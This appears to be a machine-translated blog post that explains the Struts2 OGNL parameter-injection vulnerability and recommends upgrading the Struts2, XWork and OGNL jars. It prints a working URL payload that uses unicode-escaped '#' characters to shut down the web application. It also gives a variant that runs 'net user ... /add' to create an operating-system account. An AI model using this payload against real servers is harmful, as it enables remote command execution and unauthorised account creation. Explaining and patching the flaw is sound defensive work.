Principles and solutions struts2 vulnerability

 

  

   

1, Principle

   

Struts2 core is used webwork framework that addresses the underlying action is by calling the getter / setter methods to handle http parameters, it is declared as a parameter for each http ONGL (here ONGL introduction) statements. When we submit an http parameter:

   

? user.address.city = Bishkek & user ['favoriteDrink'] = kumys
ONGL convert it to:
action.getUser (). getAddress (). setCity ("Bishkek" ;)
action.getUser (). setFavoriteDrink ("kumys")

   

This is done by ParametersInterceptor (parameter filter) to perform, using the user-supplied HTTP parameter called ValueStack.setValue (). www.2cto.com

   

order to prevent tampering with the server-side object, XWork's ParametersInterceptor allowed parameter names in a "#" character, but if you use Java unicode string representation of \ u0023, an attacker can bypass the protection, modify the protection Java manner values:

   

   

destructive code here Please executed in a test environment is strictly prohibited to use this method for malicious attacks
? ('\ u0023_memberAccess [\' allowStaticMethodAccess \ ']') (meh) = true & (aaa) (('\ u0023context [\' xwork.MethodAccessor.denyMethodExecution \ '] \ u003d \ u0023foo') (\ u0023foo \ u003dnew% 20java.lang.Boolean ("false"))) & (asdf ) (('\ u0023rt.exit (1)') (\ u0023rt \ u003d@java.lang.Runtime @ getRuntime ())) = 1

   

   

escaped like this:

   

? ('# _memberAccess [' allowStaticMethodAccess ']') (meh) = true & (aaa) (('# context [' xwork.MethodAccessor.denyMethodExecution '] = # foo') (# foo = new% 20java . lang.Boolean ("false"))) & (asdf) (('# rt.exit (1)') (# rt = @ java.lang.Runtime @ getRuntime ())) = 1

   

   

OGNL processing end result is

   

java.lang.Runtime.getRuntime (). exit (1); / / close the program, is about to shut down web applications

   

similar can perform
java.lang.Runtime.getRuntime (). exec ("net user username password / add") ;/ / increase the operating system user privileges in the case of a successful (using% 20 in the URL replaces spaces,% 2F replaces /)
permission as long as you can run any DOS commands.

   

2, Solution
many online articles have introduced three solutions, personal feel to the struts2 jar package update to the latest version of the most simple, do not change any program code, the current the latest version 2.3.4
download to the update package has a lot of jar package, I system in the main use of the following replaces the old version:
commons-lang3-3.1.jar (reservation commons-lang-2.6.jar)
javassist-3.11.0.GA.jar (new plus package)
ognl-3.0.5.jar (replacing the old version)
struts2-core-2.3.4.1.jar (replacing the old version)
xwork-core-2.3.4.1.jar ; (replacing the old version)